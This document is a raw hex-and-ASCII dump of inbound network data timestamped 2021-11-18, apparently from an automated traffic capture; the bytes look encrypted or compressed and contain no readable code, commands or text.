                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1407INData Raw: 29 ce a8 80 e3 04 95 e5 5b 88 c2 c5 92 21 84 c4 05 43 88 02 94 49 bf e8 87 4b a9 86 c9 e7 79 17 89 88 0e 54 8c 0b fe 05 44 8c 7b c0 4a e9 fe 8d 11 3c 44 96 fe 89 64 33 2a 4c 28 25 0d fe b8 63 21 f8 76 66 5b cb ba 22 d9 25 82 25 35 3c 24 29 80 ab de 89 c0 2d 8b 39 33 9a 16 8c f3 75 2d 2e 7e a0 47 db ac de 2d 09 c2 f6 1e 65 b9 ef 8c c2 35 59 be 22 8a cb fa 65 e1 1a 32 ca 9c 85 4b c1 ef 28 00 05 48 1c d4 b0 03 3a 25 55 40 37 7e b0 bf eb 49 01 88 d4 db c9 c9 7c 43 45 3a f9 a2 93 ae 32 54 cb a5 44 e9 8c 6d f1 55 75 2e 41 a8 35 11 52 2f c5 fc 79 5b 5b e2 ca 80 02 32 0f 91 3b 35 79 74 94 25 1c 5a bf 22 d3 de bb b3 ca f6 4c db 9d e6 12 9a 26 2a c1 ac 61 45 65 7e b5 8c 6e fd d7 d4 27 78 e6 ef 0b 0b 1d 1a 31 91 72 d2 21 1f 6b f6 5e 78 a1 37 bb 7b 8c e1 2d a0 07 33
                                                                                                                                                                                                  Data Ascii: )[!CIKyTD{J<Dd3*L(%c!vf["%%5<$)-93u-.~G-e5Y"e2K(H:%U@7~I|CE:2TDmUu.A5R/y[[2;5yt%Z"L&*aEe~n'x1r!k^x7{-3
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1423INData Raw: 38 5e 30 6e 01 ef b9 e1 3a 78 ec 0b ab 1a b2 01 61 57 37 c8 31 8f 72 07 f3 3f ad ab c9 e9 f1 2e 6d 92 72 2d 93 10 3b 53 8b c1 32 2d 59 00 92 0a f2 9c c4 f3 20 53 a8 9a 69 83 c2 6a 5b 1d a5 d0 8b 24 e7 04 8a 50 2b 0e ca 36 20 a1 c2 cb 24 76 03 53 f2 f2 75 0e fc 92 fe e3 7a 96 12 6f a6 0d 4e 12 a5 a3 fd 95 dc 3c f3 5b dd e4 2f 70 f2 09 c3 31 97 0b f9 3a 50 d0 70 9d 3b dd 17 2c 89 fe ba 28 12 c7 4e 7b 8a cc 5b 0a 8a d6 d0 6f e4 c7 06 ec c6 d3 e8 04 d2 cd 29 2a f2 db 48 d4 4a f2 b3 cb c7 9b 6e 3f f2 c3 5e 30 7a e9 31 cf 95 4c 1c 22 c1 8c 9f b1 a1 e3 3a ec 46 cb d3 f3 14 16 f3 bf cd ea 61 b0 7f 82 ef bb f6 bb 5a d7 ec 39 48 cb 43 c1 0f 64 61 a3 6e b1 a6 3e 98 c4 c7 4a 98 64 57 d4 8f ae 82 9b 2a 09 76 03 50 05 1b 14 88 a8 27 82 5a ca b8 4d 01 11 cb 1f 17 31 f7
                                                                                                                                                                                                  Data Ascii: 8^0n:xaW71r?.mr-;S2-Y Sij[$P+6 $vSuzoN<[/p1:Pp;,(N{[o)*HJn?^0z1L":FaZ9HCdan>JdW*vP'ZM1
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1439INData Raw: dc f0 89 bd 05 71 be 14 7f 3c 27 2d 7c e2 52 89 e5 75 e6 30 2d 05 24 65 bf 2b cd 27 51 c7 20 f1 b4 1d c8 1e 95 c1 32 28 11 d1 b5 9e c9 bd 6a c5 09 dd ce d7 9d 76 90 27 7b 33 2e ff 62 c7 02 db d7 82 0f b6 1f 05 53 22 92 44 b2 7c 91 d2 89 f7 73 6d 2a f0 9c cf e2 09 cf fd 84 55 c7 fe a2 06 c7 e8 ba 0b e5 04 2d 94 a6 f1 17 e0 37 a8 5b c0 62 22 1d e1 20 5e 6a 50 31 1f b7 b1 6f ef 2c bb c5 09 fa a9 9b 87 c9 21 f1 be 04 e8 d1 3a 7f 28 d8 ce 4a 24 e3 03 92 ff 09 70 3f 32 3e 79 8d 89 01 db fd 14 51 4f eb 71 94 2b 0b 3f a9 97 d6 bb 32 b1 ce f6 1d 64 0f 8d 71 3b b6 40 55 b4 22 ab 84 bf 01 a2 7f 93 2c f3 0e 09 3b cd 24 4e d5 51 e5 24 3b 48 2e b4 b4 a4 53 c8 b7 70 06 95 94 1e 90 02 08 42 87 9c 7c 24 66 2f 45 c0 27 de 35 bc ca f5 98 7b f9 9f 25 ee d7 14 66 b7 59 04 65
                                                                                                                                                                                                  Data Ascii: q<'-|Ru0-$e+'Q 2(jv'{3.bS"D|sm*U-7[b" ^jP1o,!:(J$p?2>yQOq+?2dq;@U",;$NQ$;H.SpB|$f/E'5{%fYe
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1455INData Raw: 1a 92 ec 8a 5a f7 c4 3d eb 70 2d cd 4f d8 6a b1 4f 2d dc 16 72 20 54 f8 66 01 1e 97 df 96 a3 5a cf ee 34 c5 c5 ef 29 1e 2b cb d0 4f b8 11 a4 d4 16 ef a6 87 09 c2 f3 0e 8b 75 fd 48 2f c6 82 16 b4 ce 76 a3 bb 4e a4 a8 29 4b ff bd 57 84 f1 be 24 c4 1f ac 55 d3 5a 25 21 fc 7e e9 9a 29 00 57 d2 28 9c e9 b7 d6 05 e1 09 c6 ba 2f 9d 67 c1 04 0b 25 d6 57 c5 f4 16 24 f7 48 4b 8a 98 4c 33 89 80 d9 0c 49 fe 41 20 94 bf 38 f4 be a2 27 0c 9b fd 3a ca 0b a0 3b ee c4 e8 0b b4 af ce 42 48 70 5e ef 64 8e 20 ff 31 d7 8a 5f 03 35 32 bf 4a 63 2e 39 b9 29 d7 35 a5 db 56 2f 4c 5c 80 69 29 d7 b5 f4 a4 e5 07 03 2c f7 09 ff e7 f5 c7 8d 83 ea 82 91 ef 28 96 ac 68 d6 54 8e 2f de 18 71 ff 31 a0 21 bb 7a 2d fa 0c a8 f1 59 24 4d 8b c6 e6 9b 89 1f 07 23 07 41 cb 7f 29 a0 2b 25 0b 16 8d
                                                                                                                                                                                                  Data Ascii: Z=p-OjO-r TfZ4)+OuH/vN)KW$UZ%!~)W(/g%W$HKL3IA 8':;BHp^d 1_52Jc.9)5V/L\i),(hT/q1!z-Y$M#A)+%
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1471INData Raw: a5 dc 2d 82 72 21 fa 5d 56 05 46 44 29 2d 03 3b 56 8b 25 4e da d3 2e bf b3 b4 96 04 84 89 ca e2 0b 58 d4 d6 e6 80 2f f3 51 c7 69 46 6c bd d2 6a b1 c3 92 cb ea 33 4c f9 4b 7a ff 28 01 8b 4b 39 35 66 84 dc ba e2 4e 9a 4b ff b2 e7 51 10 a6 0b 08 c6 05 85 8b 0e 2d fe 3d cb 7f f5 c8 2f e1 b5 d1 e8 69 11 80 27 5d 6c 5c 7c c4 20 05 7b a2 24 93 ea dd 34 ff fa 0a ec 63 9b 55 28 60 79 53 3f 2f bf 12 e0 5b ee 94 e5 ae ed ad 78 27 89 18 67 61 ae db 65 1a d2 92 33 71 a6 93 5b b9 36 a1 2b 02 c3 84 72 03 89 0b 55 d9 27 4b 56 56 e8 86 6c 84 33 b7 6b 60 e2 0c a5 0c 38 9c e6 ef 90 70 4c 2b 64 27 fa dd 18 fa d7 b2 6b 85 7c 30 56 09 d9 95 79 12 89 20 13 77 f8 e4 24 29 df 84 aa 2c 5b 2e 28 3f c7 bc d5 78 89 f9 c9 d6 bf ff ee ab b5 89 57 14 65 bd ce 9f 9c 0e c2 2b 30 df ec 61
                                                                                                                                                                                                  Data Ascii: -r!]VFD)-;V%N.X/QiFlj3LKz(K95fNKQ-=/i']l\| {$4cU(`yS?/[x'gae3q[6+rU'KVVl3k`8pL+d'k|0Vy w$),[.(?xWe+0a
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1487INData Raw: 8e 57 49 f7 5f 89 0d f7 31 80 ef 51 5d f7 24 36 9c 11 c3 16 1b 21 d0 98 45 72 5d c9 cf 2b b8 a2 8d f9 b8 f4 fa 2d 48 1f fe e4 bf 98 f8 40 a1 1d ca 27 fb 05 f2 21 f8 bf 67 b3 b2 f1 2d 46 5d 65 f9 34 12 cb 6e 64 a3 2d be f9 c7 d3 fb 34 4e fa cd 4d 15 16 ab cd b3 a7 ce 55 b6 78 09 21 d9 01 c8 7f fb b2 1f 32 53 d8 aa 36 20 70 c9 50 0d 96 56 88 32 21 fb 48 0d b5 ce cf 10 5f bd aa 97 ba 32 bd e9 66 2b 2c 21 ca 9b c2 05 28 22 01 c3 5f ec e9 bd f6 80 50 8b 09 48 2d 15 d0 05 28 35 29 34 21 f0 48 98 c1 31 e2 fb c4 e0 29 c8 8d 08 a7 ee 5d 64 e0 9d 53 ec 2e f0 65 f9 44 ae cf 1f 56 17 a1 be 3c 80 cb 91 e2 93 eb 2d 9c 02 cc b8 71 9c a9 35 b3 54 10 84 ca 64 43 ba 44 df 01 58 ff 7c 4b f8 68 a5 1a ff ec 0a 94 2f 50 21 c8 92 81 4b fe ba 84 b1 bb ad d5 8f 80 e9 f6 df f8 f2
                                                                                                                                                                                                  Data Ascii: WI_1Q]$6!Er]+-H@'!g-F]e4nd-4NMUx!2S6 pPV2!H_2f+,!("_PH-(5)4!H1)]dS.eDV<-q5TdCDX|Kh/P!K
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1503INData Raw: da 5a ea 75 56 aa b7 c2 4f 88 fe fa 73 66 4b 1e 71 11 8b 0e 68 8a a7 ab 1c 38 07 d2 8d 8b 0a bf 09 79 17 6b f9 ff 8a c1 80 9d 62 01 cb f4 67 72 54 23 62 0d 01 66 56 bf 18 49 e3 40 84 25 c1 06 ba 9e 66 7a 27 21 d0 5f e1 7e eb 3f bc 57 e0 03 39 21 59 f6 4c 29 0a c7 91 04 4c bf c1 29 f9 33 38 a5 2c 61 a9 f3 09 4c 1f 29 49 f1 fa 2a eb 56 4f ce ab 8a 95 7c 05 0a 66 16 93 10 8b 57 01 01 3e 31 de 09 fe fd eb 38 4c ca c3 14 34 be 96 56 0a 97 57 9b 28 19 84 69 27 b3 ca 21 c7 1c 84 0d 94 a5 6c 08 eb 09 21 d2 89 c2 59 36 bf 27 1b e6 d9 d6 94 ae cd 53 05 8c 09 d3 d6 df d3 c9 05 8a 1b 05 ae f6 68 5e 9d bc 3c cc 90 b2 4e af 24 18 d5 a0 e3 b7 13 01 de ae 99 d1 6a f9 90 93 1c b6 04 19 9c b8 af 7c 47 0c 88 8a 02 02 bf ba 67 a8 10 3c 7d f9 a8 59 02 c3 84 5d ac 93 03 5a 89
                                                                                                                                                                                                  Data Ascii: ZuVOsfKqh8ykbgrT#bfVI@%fz'!_~?W9!YL)L)38,aL)I*VO|fW>18L4VW(i'!l!Y6'Sh^<N$j|Gg<}Y]Z
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1519INData Raw: 9c f9 32 c7 09 39 84 e3 bf 65 cd 94 31 ed 9b c5 31 c6 63 83 02 c7 e7 67 9b 5f 22 e0 0d 80 d3 f8 af 53 6a 92 98 f8 4f a4 a8 5d d7 e0 e5 b8 b7 0b 74 f9 01 49 48 21 65 1c 77 c1 b1 29 82 31 cb 89 f0 5d 5e b2 cb 08 fe 37 49 7d a9 79 c2 cf 09 59 77 9c bd 4c 21 10 3d da 3f f2 c2 15 36 b8 17 16 e2 1c f2 41 96 12 28 a8 7d e0 1e 89 f7 9e 44 e7 03 c9 75 45 38 25 99 a2 40 11 33 1e 3a bf 37 f4 5c 3c ba e1 16 b0 b1 58 c2 09 1e 62 7a 77 6c 1a ac 7a fb 73 5f 99 62 31 ca b0 ec 2e 08 1a 62 a9 1c b9 f0 ff 85 a6 91 40 1c 29 c7 93 1e fc c3 5e dd e9 84 44 09 c1 05 be f8 96 a4 fc f1 d2 17 c6 ba 60 cf 1e 31 fe a2 f4 42 a4 b2 ad d5 c2 09 5f 65 c1 a3 e1 12 e6 f3 f4 4f c2 40 24 74 03 52 46 e8 b5 41 f7 c2 ad 3c 79 e6 67 c1 70 7d 70 64 09 95 46 2c 60 66 84 d4 f4 01 ef 94 75 92 ff a9
                                                                                                                                                                                                  Data Ascii: 29e11cg_"SjO]tIH!ew)1]^7I}yYwL!=?6A(}DuE8%@3:7\<Xbzwlzs_b1.b@)^D`1B_eO@$tRFA<ygp}pdF,`fu
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1535INData Raw: d1 43 a2 47 bd 41 6f c1 33 5c 49 81 13 0c a0 d7 5e 9d 06 d5 06 f8 0f af 2a c3 ba 17 7c 89 9d f9 e9 74 01 09 e8 8f d4 16 b2 db 3a e9 52 d6 b2 99 28 16 b7 a2 2e e7 63 27 92 e0 55 29 bc df 94 d7 f1 c2 fd b2 11 89 4e b0 08 01 cf 90 74 2d 09 c7 db 7c 13 f7 a3 50 51 6d 6f b6 ce 02 ee cd 18 59 4b 6a 44 f9 09 62 29 f3 7b b5 8e 21 d7 49 c1 e9 b9 f0 51 20 8b 30 28 ac e2 e9 5d 79 10 69 fe a1 a5 54 e9 e4 03 e9 53 96 b5 1d 15 a7 af b3 d1 97 bf 6c b7 b6 5a 10 3c cc 35 88 33 13 b6 30 e4 09 13 ee 8b 04 28 5d 41 bf 51 1d 44 21 11 49 c8 0a 49 fd 34 a3 c8 36 6d bc a7 18 f6 a2 72 fd 4e 41 b5 d4 21 51 c9 1c eb 09 13 02 77 3e fd 9e 9c 86 0b 82 91 de f9 88 c3 5d 61 ea e4 ec 04 a4 9d aa 02 60 a6 05 30 1a 9c 5f 14 b4 bd fe d8 73 4f ab bf 2d 66 18 1a 03 97 ce ce 13 5b 89 18 89 e8
                                                                                                                                                                                                  Data Ascii: CGAo3\I^*|t:R(.c'U)Nt-|PQmoYKjDb){!IQ 0(]yiTSlZ<530(]AQD!II46mrNA!Qw>]a`0_sO-f[
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1551INData Raw: 7e b6 eb 7e 84 51 ef 3a e8 a9 a2 8b 75 ec ad 9d 60 f0 f7 05 48 11 1b d6 22 64 c7 c2 6e 75 f9 28 e9 08 fc 05 c2 03 02 d9 1a 81 2d 6b 29 72 12 af 3e 73 e4 22 25 fc c3 95 74 53 65 02 ca 92 4e ba 32 da df e2 9a f3 40 14 cb 7a 58 a6 4a bf d1 7a eb 80 59 54 af 7e 59 f1 6b f7 66 86 4e e3 e6 c5 25 c6 f7 94 5f b7 84 b9 ef fa f9 d8 a4 37 c1 d9 f5 67 f1 17 08 e3 f1 cb ee fd 14 9c 92 6a bc bd 51 ce 38 7a c9 01 c1 1b 24 22 1a 93 0e ad 21 57 b6 06 5e f4 23 ea 5b 80 74 1c 98 fc 31 12 db 89 cf f9 b3 2f e8 4c 97 2f eb 1f 14 f3 42 ee 5b ac d6 17 da 33 b1 4e f2 11 b8 c2 d1 da 48 49 43 33 0b 4e be 99 7e 14 23 fa f6 00 69 1a 14 26 bd 46 af 7b 0f 4b db fd 15 cb 35 d5 65 8b 97 e6 ac 92 a4 bf 8a 4b 2a c3 1f 22 c2 1c 97 02 4c 31 f7 5e f1 70 ee 20 91 55 69 5f e6 94 86 2e 7e ca bb
                                                                                                                                                                                                  Data Ascii: ~~Q:u`H"dnu(-k)r>s"%tSeN2@zXJzYT~YkfN%_7gjQ8z$"!W^#[t1/L/B[3NHIC3N~#i&F{K5eK*"L1^p Ui_.~
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1567INData Raw: b2 05 39 63 dc 5e b5 a7 ec ab de bd cc 92 ea 0a fa 0f 3c af c8 d8 f0 17 b0 9d 9c 7e 08 d6 db 9d 9f 68 87 d4 7d 4e fa cb 9f 5b 74 5b c5 75 0f ac ca e5 6f 51 29 b8 61 03 78 58 b4 a1 cb 1a e2 2d 02 9a 7f 76 31 e9 81 47 e0 32 13 f4 21 03 e0 b9 00 bb 9e ec 08 c1 dd 20 b0 c5 19 78 76 ef 90 f5 36 19 0c e1 42 08 22 28 01 20 74 05 2b 05 8d 89 f7 eb 7d 8a 04 89 ae f6 de 2d ce 7e 7f 7a 5a 6f 95 79 fb cb 5e 7e c9 77 89 97 dd 65 12 0e 21 1e 49 ff 57 f3 8e 35 30 bb cb 3f 7c 04 06 bf a1 5d 32 fe b7 09 70 9d 14 25 bf 52 b1 5b 20 fd 9d 89 e9 71 32 16 df aa 39 19 d9 f7 7b e9 42 d3 b0 2c c9 fa d6 bf dc 4a e9 57 fa 49 82 98 d7 f9 2e 69 f7 c5 b8 0a 17 05 c5 cb c2 8b 57 b8 a3 33 13 b5 de 0c cb d0 f6 5b ff 98 4e c6 97 dc ed 51 36 f4 cf 1c 97 94 c0 bd 9a 15 dd 22 24 35 40 5c 70
                                                                                                                                                                                                  Data Ascii: 9c^<~h}N[t[uoQ)axX-v1G2! xv6B"( t+}-~zZoy^~we!IW50?|]2p%R[ q29{B,JWI.iW3[NQ6"$5@\p
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1583INData Raw: 60 56 09 f3 29 db bf 76 30 c9 c1 e4 cf 7b ac 9b a2 0e 5e 56 4b 75 89 11 1a 41 fc f1 47 59 75 e9 05 7d ff e1 34 ad fa 90 da 01 c8 29 4b c6 f6 81 78 bf fb d9 a1 95 a5 5e 93 6a 00 0e 0f b6 56 fc 70 2d eb c7 cb 2f 54 40 61 d0 03 0b 69 45 92 f1 81 2b bb 67 7f aa ff 13 d6 be ca 6a 2d 1f 45 c7 24 e9 04 31 0b 35 bf 35 f0 85 85 eb 39 4f db d9 b5 1b c9 11 6a bd 54 97 cd 10 3a a3 b3 27 0b 64 00 4a 29 c1 77 31 d6 6a 98 1d 0f 93 89 27 7e 5d 61 e8 29 df 7c 67 d7 b3 7b 25 d7 dc 48 cd 46 2f 29 df 6a 35 dc be 92 b8 f3 f7 ec 3e 26 ce 04 cd 50 29 d3 9d d0 c3 b0 45 96 3e 53 5a 3a e7 76 40 0e 05 97 f4 6a 52 75 4c 05 6b fe 42 de a4 13 f3 ff 8b b3 06 09 08 01 c3 6d 4a f7 bf 74 c5 f3 79 76 04 20 d9 ce e3 4e 99 c9 a2 3e bb 4a c3 b2 81 d7 c9 f5 2a b4 ab dc bd 58 6b b1 40 c4 e3 8d
                                                                                                                                                                                                  Data Ascii: `V)v0{^VKuAGYu}4)Kx^jVp-/T@aiE+gj-E$1559OjT:'dJ)w1j'~]a)|g{%HF/)j5>&P)E>SZ:v@jRuLkBmJtyv N>J*Xk@
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1599INData Raw: 4b cd d5 44 91 bb 8c b4 b8 9b 58 27 d2 0e 2d 36 b2 66 45 7a 01 2d 29 f8 51 6c 96 05 eb 30 ee 89 c3 09 9d d3 5e 8a c7 03 06 0a e3 24 35 ae 9b 27 78 8a 4e f3 65 3e bb 75 06 cc d2 29 18 f3 21 cb a8 ee e3 5a 7c cd 79 e6 56 f8 6b 01 24 28 16 9c 3b 9d f5 7b 8a df 4b bf 72 da c9 7d 56 81 7a 75 d1 8e a0 22 27 31 de e6 31 9f 5c 23 44 55 e9 9b 92 af 24 06 e3 a5 91 39 51 e5 f6 f5 1e 37 b5 46 41 2f 21 d7 71 51 a5 5d 1a eb 42 f7 61 72 d1 28 af cf 5b 22 18 e9 1a f4 f6 e9 66 8b 27 5b 29 09 f0 fd 16 d1 b3 6f 2c aa 62 b0 5e ec ff 9f 7b e1 a8 62 bf 04 53 f6 ee bd d5 a5 be cc 24 36 9e b7 cb 59 ca 44 b9 98 68 36 53 35 eb 0b e9 21 c7 5d 65 49 26 36 ee 32 cc 73 f6 0c 85 c1 35 67 c2 05 9e 2a 47 d7 f4 eb af 8b dd 6b 40 53 f2 6b dc 55 27 14 e5 95 8b 83 b0 61 01 f1 aa 07 dd 68 44
                                                                                                                                                                                                  Data Ascii: KDX'-6fEz-)Ql0^$5'xNe>u)!Z|yVk$(;{Kr}Vzu"'11\#DU$9Q7FA/!qQ]Bar(["f'[)o,b^{bS$6YDh6S5!]eI&62s5g*Gk@SkU'ahD
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1615INData Raw: b0 2b e1 8d 02 26 b9 f5 47 97 be df 2d 9a 2b f3 36 17 8b 16 8d 96 3b d9 66 49 f2 19 2e 2a e8 30 4b ce e9 5f 32 b0 c1 a2 06 c7 06 a4 0c 40 54 bb 72 5a f9 a1 21 58 c0 e8 ec df 9d de 91 69 46 49 80 62 31 da 2f 2b 30 6c bb 9d 1b 0a 4b 1e ae 9c e2 f1 a1 42 29 7e d8 b5 30 9f f0 c5 4a f2 bf 2d 2a 3f d8 31 08 09 dc 26 51 56 df 7b 03 26 1a 25 fb b4 02 f8 0f 86 02 22 09 fa df 71 96 94 ef c0 dd b9 2b d8 ca 13 25 fb 8e a6 25 02 73 cf a7 5f e6 0a 25 01 37 df a4 20 f6 ee bc cb a5 af 64 f7 af b9 e1 4a 8a 31 4a b3 93 02 33 c5 f4 39 28 85 e1 19 dc 5f e7 f9 7b 28 96 66 c4 50 48 b5 b3 bd 65 96 eb 65 d4 03 00 66 8f 03 fa de 71 58 a7 72 b2 97 fc ee 78 09 f7 bf 6a 7b 7d e5 cc a5 5d 64 45 29 ca 80 88 6b 40 f1 21 ff 97 db 5b 04 eb 39 de c2 d8 0c 21 81 03 02 6c 29 d1 e8 27 be 74
                                                                                                                                                                                                  Data Ascii: +&G-+6;fI.*0K_2@TrZ!XiFIb1/+0lKB)~0J-*?1&QV{&%"q+%%s_%7 dJ1J39(_{(fPHeefqXrxj{}]dE)k@![9!l)'t
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1631INData Raw: 2b 18 fb 9b 02 2d 67 8f 69 fd f1 46 49 77 db 46 af 6e b5 a6 39 a6 c7 9d 77 10 68 0e 21 5a c7 2c 15 2d b4 0e 6e 13 e2 86 82 8b 37 bf 2e 1d 6e ad e4 ff ef f8 f1 e1 01 32 fc e1 ba e1 6f 39 65 e1 e9 3b fc 4c a4 ee b8 ea d1 57 4c 61 27 c7 ce 5d 5c 11 c8 a5 be dc 50 2b 56 13 12 3d 29 4c e3 b0 33 be d0 25 f7 64 b0 00 66 01 5f 10 f6 56 2f 21 32 73 71 1b b4 d6 ef 39 25 2a 77 6f 2b e5 3c 0b e2 24 71 41 49 f5 d9 91 6b ff 66 3b 5f 35 2c 28 01 5b 0f dc ba 25 f7 6f 29 30 d8 37 2c 13 9f b5 04 9d b3 e1 ca 6f 49 ad 58 7f 6e 43 80 70 c1 cb 17 e1 94 2b 84 df f7 ba 4e da cb 4e e8 1d 4e 55 80 30 4c e5 4e fb da 0d 55 46 3b b6 89 4b fe 53 86 b7 e9 2f b9 f9 1e 69 20 dd a5 ee 09 37 5b 05 f9 f1 84 c2 0d ec 43 c4 e1 24 24 eb 07 7f c9 25 aa 26 84 ea 9b 48 cd 06 2b a0 38 df 02 39 1a
                                                                                                                                                                                                  Data Ascii: +-giFIwFn9wh!Z,-n7.n2o9e;LWLa']\P+V=)L3%df_V/!2sq9%*wo+<$qAIkf;_5,([%o)07,oIXnCp+NNNU0LNUF;KS/i 7[C$$%&H+89
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1647INData Raw: 40 a9 31 41 a1 e6 77 cf 7a 45 50 3c 6f 39 f6 01 17 b8 97 b6 aa 5e 62 41 c9 03 5e 53 59 20 7a 74 f4 bb ad 42 92 b1 82 2a 99 78 2b 85 68 9d d6 3a 72 65 d0 7d 79 56 b2 16 0d d7 79 e3 c1 29 da 33 72 82 d3 bf 30 7b 03 1e 09 4a d2 b3 1e 59 b9 77 95 c5 7b 27 76 8f 71 df 3c 6f 8a 2d 4c 2c b5 0c 21 d1 4e 09 74 df e5 2e 68 e5 36 09 6f 4e 24 0a 29 1d e5 52 af 46 2a 17 31 c0 25 bf d8 db 42 8c bf 70 17 02 f3 c4 15 13 79 05 7d d1 1a 4b dd 4e be 02 1f bb 4d 4e 1c 7e 7f 71 d2 4f 4b eb 5f 94 67 97 d4 d7 60 b8 9e 17 52 95 77 a2 4a 08 1e f6 af 16 e6 ff 9d 0a 2f ff 2c 21 ee 84 98 d0 2a 29 ce 19 9d 24 bb 05 aa 39 68 2a 84 35 be e9 89 84 31 f6 ab 62 21 07 24 b9 e9 1f 85 29 fa b9 f8 72 4f ca 67 19 1f 09 e6 74 a8 52 20 5f 2d ad ac 7f 5e 69 f2 0a 82 c9 09 f9 df 98 63 29 03 f4 ce
                                                                                                                                                                                                  Data Ascii: @1AwzEP<o9^bA^SY ztB*x+h:re}yVy)3r0{JYw{'vq<o-L,!Nt.h6oN$)RF*1%Bpy}KNMN~qOK_g`RwJ/,!*)$9h*51b!$)rOgtR _-^ic)
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1663INData Raw: 25 f9 7f 1a d3 d1 72 ac 02 16 21 eb 34 38 84 e4 be ad 11 d4 5f c9 cb c6 d4 d2 f6 ca 0e 10 cb 1c d7 cd 59 96 1e f1 f8 33 e1 33 10 31 3d ec 29 d0 5f 0c a9 60 90 e1 25 f1 e5 ed 20 cc 27 21 c7 f1 bf 6b 61 41 40 42 4e 06 e9 50 f9 5c 5a c3 91 2a bf 21 08 01 d3 8b 32 bf 0a 6b 29 df 6e 84 3d ba a2 60 c9 37 0b 46 55 9e 6c 53 09 8a 25 1f fd e5 9b ad 56 6e e9 5c b8 51 29 04 ae 71 ff 3e 6d d1 5c 2a bb 2c 15 59 95 f7 3c 9d 56 19 0b 5e ec f2 9f 08 3d 7e 05 f7 19 9c af a7 30 d7 aa 38 55 1d ad 1b af 54 47 c9 57 51 92 62 b0 ed 55 dc 6c c2 30 03 57 76 cd 49 5c e4 cb 5d c7 eb ae d9 27 ce cd b5 40 8d 41 df 29 f5 2f 0f 9f 09 ef 5e 3d 59 fa 61 df 3e 2d d3 c2 11 10 6a e2 a5 89 13 d5 82 1e c4 47 8e 9a a3 21 93 0f 80 94 d1 06 00 7c 0b 4b de 66 c2 67 8d 7a 3c 06 26 e9 d9 6b 12 30
                                                                                                                                                                                                  Data Ascii: %r!48_Y331=)_`% '!kaA@BNP\Z*!2k)n=`7FUlS%Vn\Q)q>m\*,Y<V^=~08UTGWQbUl0WvI\]'@A)/^=Ya>-jG!|Kfgz<&k0
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1679INData Raw: 9e f9 09 38 ce ba 5b 8a d2 4c 42 a1 31 fe 49 78 32 4a 93 cd 89 7b 85 2c ee f3 a1 17 ea 21 b8 be c4 ff 32 aa c2 ac 08 df 08 2e 24 e9 dd fb 99 0b b0 ab d5 96 c9 9e fe cb 70 6c b0 4d 4f e6 eb 2c 53 ee 95 7d 9c 60 92 b4 9f 66 11 bf d8 3d 9e da e9 5d 91 d0 e1 6e 39 f7 2f 17 bd a7 6d 5e ff 01 15 90 94 5c 10 3a be 77 d9 8b d5 c6 3a 88 2a 09 f2 26 29 1f d5 72 f1 dd 90 e9 cf d8 df 97 1f 29 58 3e e8 c9 2d bb b2 63 e5 19 11 04 41 93 6a 2c 23 8b 5b 01 bb 39 71 81 18 ba 25 d3 f8 37 2f f2 61 89 11 db 99 6f 09 17 7f ec 26 4a 10 ef d2 2a c1 57 f9 4f 6b 99 cf e7 41 06 21 d0 7f 89 da c1 0d 6b ac b2 e5 a2 78 42 18 18 09 da 2a 01 f1 50 2d 2b 29 4b d9 ae cc 9b c2 fe 1c ae 20 9d 9a f3 fc 23 64 c3 cc 21 ee b5 d1 ae af c0 52 c6 17 a5 47 17 f8 ee 29 d9 33 0f 76 5f 07 22 da db fe
                                                                                                                                                                                                  Data Ascii: 8[LB1Ix2J{,!2.$plMO,S}`f=]n9/m^\:w:*&)r)X>-cAj,#[9q%7/ao&J*WOkA!kxB*P-+)K #d!RG)3v_"
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC1695INData Raw: b4 16 17 45 88 e9 53 98 c8 12 75 b9 05 e0 8a 83 0a 43 2c 41 e9 e9 43 04 0a b9 62 88 89 24 3c 61 85 60 51 1d bd df 66 89 03 0e 80 19 16 4b 40 77 16 59 6d d9 c0 72 d2 fe ff 81 e3 84 12 f5 39 fb 51 01 89 2b f5 94 d2 08 65 3a 16 0f 58 33 74 16 49 be 6d eb ca 2e 27 b9 39 2a 8c 11 01 03 2e fe 79 2e 2f f2 7e 5f eb 3d fb 6e dd 99 6b 88 b1 ff 72 31 3b 36 8f f2 16 06 89 d6 88 6e 29 64 ce 80 35 ce 59 4f 64 ce ea 34 be 86 4f 5a 5f cf e8 8e a4 be f8 32 a5 fb f7 2c 28 03 a4 5e f6 ef 71 cc c7 8c 2d 3e c5 21 fe 29 ad 3b b6 7f 67 4e ef 44 fe bb 62 b6 f3 55 cc 82 04 37 63 a7 c4 1c bd 3c d3 f1 01 6d 34 94 e6 5b d2 9b 0c 7d 46 e7 bf 70 fa 7f f1 01 a5 2b 35 31 db 09 d0 a6 56 13 96 ee b8 6a b3 66 13 ac 21 f7 e8 76 e1 c3 28 63 2e cb 06 dd ee 68 91 0b b4 52 af b6 01 4f 9d 22 2e
                                                                                                                                                                                                  Data Ascii: ESuC,ACb$<a`QfK@wYmr9Q+e:X3tIm.'9*.y./~_=nkr1;6n)d5YOd4OZ_2,(^q->!);gNDbU7c<m4[}Fp+51Vjf!v(c.hRO".
